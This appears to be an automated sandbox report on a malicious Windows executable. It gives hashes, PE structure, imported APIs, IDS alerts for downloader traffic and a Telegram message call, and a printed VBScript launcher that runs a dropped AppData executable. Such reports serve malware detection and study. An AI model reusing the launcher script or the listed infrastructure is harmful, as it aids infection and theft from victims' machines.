                                                                                                                      Preview:EA06..<..B{..=^.V..fU...q0.Rhs:.N.Z......B.8.L)......|\..B.H.V&8Y.V....06..nQ .J..L..\.N..j.~qi..2....>.].....YW.UlTJt.......eX..gs..3.U.d.Fc0..6..2.G..h.....f..`......8ej.w..&s*...34P..d@.....(u8g~.W.U.2..FQ0.V@21T.....G.....*.&..x|...b......}.....S...2...(.{&..@....V..@....aL..(|6...b..(2 .B.G..* ....@....>...qp.N...t.Z..Zd.....|. .O..<... ....K.Yr....M9.S...]N.\.|.lH....)....?.~.u...f.)...E.L'.......p..L/`....P....P.B~.(L...(..6..*.....P.........q...q2.Z.4...L.Q/..,Nc2.pg3.."u`..k<....J..(.....Q...5..F..(.@...fgB...J.Vs...(3.4..I..-wZeb.m.U.s....Sw.ec.^. #vI]rq8.Y!T9..OE.Q*....c6.W.Q..2.I...z...e.F.t..q<..,v.m2.L.[..JD.c?.Pg.(...P^)..4..V..c5.\.u...hs{].eJ../...BMP.N&.zM.#?..+T..:....@.....k...5:E.}.J$...r.8.P+.....(b5F.S)4x...R.q).....#.R...L.a..S+T+...1..4...af.......8....K..qF..... ..:....=...H.^.7..F.L.[0@#.g{X........|j..]..0..(....3...1..:.....x..1J.P. ......J..(.2P.h^bU.6..D..f.....0.Sh3y.....*.>|..A.N.T...gA.....:.L....u7..X...yW.....'S.op.S}..M...*
                                                                                                                      Process:C:\Users\user\Desktop\ty1nyFUMlo.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):277504
                                                                                                                      Entropy (8bit):6.941506882224219
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:01neU8qOIhWHHaqxqPpkJ0WnKexJGON3S:01neU8qOWWnN0PpLeKo3S
                                                                                                                      MD5:17465D740D45D87AB68EA46C2608616D
                                                                                                                      SHA1:FB8A1A604BC45167F301092F9D47CE614B713E5F
                                                                                                                      SHA-256:14E9E8D56D8EF9B6944EB18F0C7FD8679743E0868F532104E08CB4E920A4DD5A
                                                                                                                      SHA-512:5A8D719D61FF4DD777C0C770AC51AD43CF9D25B01A71D0B4E237333333BD99FE84D0D8FB6417C078AFA1A3DAC4AFDBCE9B0ED46DA5F12C1205BCFC0A0FBA494D
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:...ZGWNV512X..80.IC3ASLZ.WNV112XA880LIC3ASLZDWNV112XA880LIC3.SLZJH.X1.;.`.9|.h.[( l*68)$P\.; VV_8i!Va!94d> vu~ax,W\UbDN9eSLZDWNVat2X.9;0...UASLZDWNV.10YJ9h0LoG3AGLZDWNV/u6XA.80L)G3AS.ZDwNV132XE880LIC3ESLZDWNV1.6XA:80LIC3CS..DW^V1!2XA8(0LYC3ASLZTWNV112XA880..G3.SLZD7JV&!2XA880LIC3ASLZDWNV1.6XM880LIC3ASLZDWNV112XA880LIC3ASLZDWNV112XA880LIC3ASLZDwNV912XA880LIC3IsLZ.WNV112XA880b=&K5SLZ`sJV1.2XA.<0LKC3ASLZDWNV112Xa88Pb;0A"SLZSGNV1Q6XA*80LaG3ASLZDWNV112X.88pb;&_.0LZHWNV1.6XA:80LsG3ASLZDWNV112X.88rLIC3ASLZDWNV112XA|<0LIC3.SLZFWKVe.0X9.90OIC3.SL\..LV.12XA880LIC3ASLZDWNV112XA880LIC3ASLZDWNV112X.E.?...Z2..ZDWNV100[E>08LIC3ASLZ:WNVw12X.880{IC3dSLZ)WNV.12X?8802IC3%SLZ6WNVP12X.880#IC3/SLZ:WNV/3.xA82.jIA.`SLPD}.%.12R.980H:`3AY.XDWJ%.12R.;80H:f3AY.^DWJ%.12R.=80Hc.3B.Z\DWU9.12RA;.%JIC(kuLXlmNV;1.~A;.%JIC(kqLX.^NV5.d+\886d.C3K'EZDU.\116r_:.tLII.c-GZDSeV..LTA8<.LcaMLSL^oWdH3.?XA<..2GC3ExLpf)AV15.Xk&:.CIC7kq2JDWJ}1..&P884gIi.?ALZ@|N|.O!XA<.0fk='ASHqD}l($12\j8..2_C3ExLpf)YV15.Xk.F(LIG.AyRX.ONV5.4r#8J.ZI30
                                                                                                                      Process:C:\Users\user\Desktop\ty1nyFUMlo.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1096704
                                                                                                                      Entropy (8bit):6.9398450149515005
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:nqDEvCTbMWu7rQYlBQcBiT6rprG8aT7LCjhY:nTvC/MTQYxsWR7aT7mF
                                                                                                                      MD5:A3D99BCF752D0B63FA8D5515A4765777
                                                                                                                      SHA1:CEA1BB29D2D34F8C46FA6C9C645CC9753D5A918E
                                                                                                                      SHA-256:E71789B9C70A2B9BBE541BAF50D4E222BE0D1B1CC2B38BE925C01D9169158BF5
                                                                                                                      SHA-512:F7E00D50005777373D65B9065BAB7CD43AE3160554165E71C2DB7BF901C34EB0608CD854E35E3159D48F698470DB9A58E828AA6B4C2FA79C41149FC8030CDFE9
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                      Reputation:low
                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...eKag..........".................w.............@.......................... ......b.....@...@.......@.....................d...|....@...Q.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc....Q...@...R..................@..@.reloc...u.......v...F..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\translucently\enterogenous.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):290
                                                                                                                      Entropy (8bit):3.3780042796035423
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:DMM8lfm3OOQdUfclgMsUEZ+lX1iCQcD6YLvnriIM8lfQVn:DsO+vNlgMsQ1FD6YLmA2n
                                                                                                                      MD5:786D545310C2D787BDC4041D679BF214
                                                                                                                      SHA1:C754D6D29863E9B0F14A8A2A03A1B72705ABCE26
                                                                                                                      SHA-256:BC897BFC41537B46480BA6D110D5B63D3ACCEE6915CE23E02625A20371B50C98
                                                                                                                      SHA-512:1786A25E0B5A1CA4E8B0838049C1EFDA4596DC626F68DFC1C257DA4CB31AFDE0DCE114FFB40A1CDAAE3B6E2BF4E41353BD3CEA8ACD57ADBE70CF9A94F79E7421
                                                                                                                      Malicious:true
                                                                                                                      Reputation:low
                                                                                                                      Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.t.i.n.a.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.t.r.a.n.s.l.u.c.e.n.t.l.y.\.e.n.t.e.r.o.g.e.n.o.u.s...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Entropy (8bit):6.9398450149515005
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                      File name:ty1nyFUMlo.exe
                                                                                                                      File size:1'096'704 bytes
                                                                                                                      MD5:a3d99bcf752d0b63fa8d5515a4765777
                                                                                                                      SHA1:cea1bb29d2d34f8c46fa6c9c645cc9753d5a918e
                                                                                                                      SHA256:e71789b9c70a2b9bbe541baf50d4e222be0d1b1cc2b38be925c01d9169158bf5
                                                                                                                      SHA512:f7e00d50005777373d65b9065bab7cd43ae3160554165e71c2db7bf901c34eb0608cd854e35e3159d48f698470db9a58e828aa6b4c2fa79c41149fc8030cdfe9
                                                                                                                      SSDEEP:24576:nqDEvCTbMWu7rQYlBQcBiT6rprG8aT7LCjhY:nTvC/MTQYxsWR7aT7mF
                                                                                                                      TLSH:5C35BF0273D1C062FFAB92334B5AF6115BBC69260123E61F13981DB9BE705B1563E7A3
                                                                                                                      File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                                                                                                      Icon Hash:aaf3e3e3938382a0
                                                                                                                      Entrypoint:0x420577
                                                                                                                      Entrypoint Section:.text
                                                                                                                      Digitally signed:false
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                      Time Stamp:0x67614B65 [Tue Dec 17 09:59:01 2024 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:5
                                                                                                                      OS Version Minor:1
                                                                                                                      File Version Major:5
                                                                                                                      File Version Minor:1
                                                                                                                      Subsystem Version Major:5
                                                                                                                      Subsystem Version Minor:1
                                                                                                                      Import Hash:948cc502fe9226992dce9417f952fce3
                                                                                                                      Instruction
                                                                                                                      call 00007F7658C088B3h
                                                                                                                      jmp 00007F7658C081BFh
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      push esi
                                                                                                                      push dword ptr [ebp+08h]
                                                                                                                      mov esi, ecx
                                                                                                                      call 00007F7658C0839Dh
                                                                                                                      mov dword ptr [esi], 0049FDF0h
                                                                                                                      mov eax, esi
                                                                                                                      pop esi
                                                                                                                      pop ebp
                                                                                                                      retn 0004h
                                                                                                                      and dword ptr [ecx+04h], 00000000h
                                                                                                                      mov eax, ecx
                                                                                                                      and dword ptr [ecx+08h], 00000000h
                                                                                                                      mov dword ptr [ecx+04h], 0049FDF8h
                                                                                                                      mov dword ptr [ecx], 0049FDF0h
                                                                                                                      ret
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      push esi
                                                                                                                      push dword ptr [ebp+08h]
                                                                                                                      mov esi, ecx
                                                                                                                      call 00007F7658C0836Ah
                                                                                                                      mov dword ptr [esi], 0049FE0Ch
                                                                                                                      mov eax, esi
                                                                                                                      pop esi
                                                                                                                      pop ebp
                                                                                                                      retn 0004h
                                                                                                                      and dword ptr [ecx+04h], 00000000h
                                                                                                                      mov eax, ecx
                                                                                                                      and dword ptr [ecx+08h], 00000000h
                                                                                                                      mov dword ptr [ecx+04h], 0049FE14h
                                                                                                                      mov dword ptr [ecx], 0049FE0Ch
                                                                                                                      ret
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      push esi
                                                                                                                      mov esi, ecx
                                                                                                                      lea eax, dword ptr [esi+04h]
                                                                                                                      mov dword ptr [esi], 0049FDD0h
                                                                                                                      and dword ptr [eax], 00000000h
                                                                                                                      and dword ptr [eax+04h], 00000000h
                                                                                                                      push eax
                                                                                                                      mov eax, dword ptr [ebp+08h]
                                                                                                                      add eax, 04h
                                                                                                                      push eax
                                                                                                                      call 00007F7658C0AF5Dh
                                                                                                                      pop ecx
                                                                                                                      pop ecx
                                                                                                                      mov eax, esi
                                                                                                                      pop esi
                                                                                                                      pop ebp
                                                                                                                      retn 0004h
                                                                                                                      lea eax, dword ptr [ecx+04h]
                                                                                                                      mov dword ptr [ecx], 0049FDD0h
                                                                                                                      push eax
                                                                                                                      call 00007F7658C0AFA8h
                                                                                                                      pop ecx
                                                                                                                      ret
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      push esi
                                                                                                                      mov esi, ecx
                                                                                                                      lea eax, dword ptr [esi+04h]
                                                                                                                      mov dword ptr [esi], 0049FDD0h
                                                                                                                      push eax
                                                                                                                      call 00007F7658C0AF91h
                                                                                                                      test byte ptr [ebp+08h], 00000001h
                                                                                                                      pop ecx
                                                                                                                      Programming Language:
                                                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                                                      • [IMP] VS2008 SP1 build 30729
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xc8e64          0x17c         .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xd4000          0x35184       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x10a000         0x7594        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0xb0ff0          0x1c          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0xc3400          0x18          .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0xb1010          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x9c000          0x894         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xd4000 | 0x35184 | 0x35200 | 9781137194ae32d11e469bd9976e19c7 | False | 0.8800091911764706 | data | 7.777513375929972 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x10a000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xd44a0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xd45c8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xd48b0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xd49d8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xd5880 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xd6128 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xd6690 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xd8c38 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xd9ce0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_STRING | 0xda148 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xda6dc | 0x68a | data | English | Great Britain | 0.2735961768219833
RT_STRING | 0xdad68 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xdb1f8 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xdb7f4 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xdbe50 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xdc2b8 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xdc410 | 0x2c81b | data | | | 1.0003620425784014
RT_GROUP_ICON | 0x108c2c | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x108ca4 | 0x14 | data | English | Great Britain | 1.15
RT_VERSION | 0x108cb8 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x108d94 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll | GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll | EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-11T06:49:11.042226+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49764 | 193.122.6.168 | 80 | TCP
2025-01-11T06:49:11.948460+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49764 | 193.122.6.168 | 80 | TCP
2025-01-11T06:49:12.512517+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.9 | 49776 | 104.21.32.1 | 443 | TCP
2025-01-11T06:49:13.198467+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49782 | 193.122.6.168 | 80 | TCP
2025-01-11T06:49:13.763692+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.9 | 49788 | 104.21.32.1 | 443 | TCP
2025-01-11T06:49:15.017568+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.9 | 49796 | 104.21.32.1 | 443 | TCP
2025-01-11T06:49:17.567928+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.9 | 49815 | 104.21.32.1 | 443 | TCP
2025-01-11T06:49:18.840277+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.9 | 49826 | 104.21.32.1 | 443 | TCP
2025-01-11T06:49:20.233159+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.9 | 49839 | 104.21.32.1 | 443 | TCP
2025-01-11T06:49:21.526975+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.9 | 49847 | 104.21.32.1 | 443 | TCP
2025-01-11T06:49:22.457221+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.9 | 49853 | 149.154.167.220 | 443 | TCP
